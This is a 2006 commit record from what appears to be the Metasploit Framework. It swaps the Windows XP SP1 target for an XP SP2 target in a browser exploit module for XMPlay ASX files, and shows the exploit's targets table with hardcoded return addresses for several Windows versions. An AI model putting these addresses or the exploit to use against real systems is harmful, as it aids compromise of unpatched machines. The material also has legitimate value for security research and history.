removed XPSP1 target in xmplay_asx.rb and replaced it with an XPSP2

target. 


git-svn-id: file:///home/svn/framework3/trunk@4152 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Mario Ceballos 2006-11-26 20:00:08 +00:00
parent 296144fa9c
commit 55e0b973b1
1 changed files with 1 additions and 1 deletions

View File

@ -37,7 +37,7 @@ class Exploits::Windows::Browser::Xmplay_Asx < Msf::Exploit::Remote
'Targets' =>
[
[ 'Windows 2000 Pro English SP4', { 'Ret' => 0x77e14c29 } ],
[ 'Windows XP Pro SP1 English', { 'Ret' => 0x77e53877 } ],
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x77dc15c0 } ],
],
'Privileged' => false,
'DisclosureDate' => 'Nov 21 2006',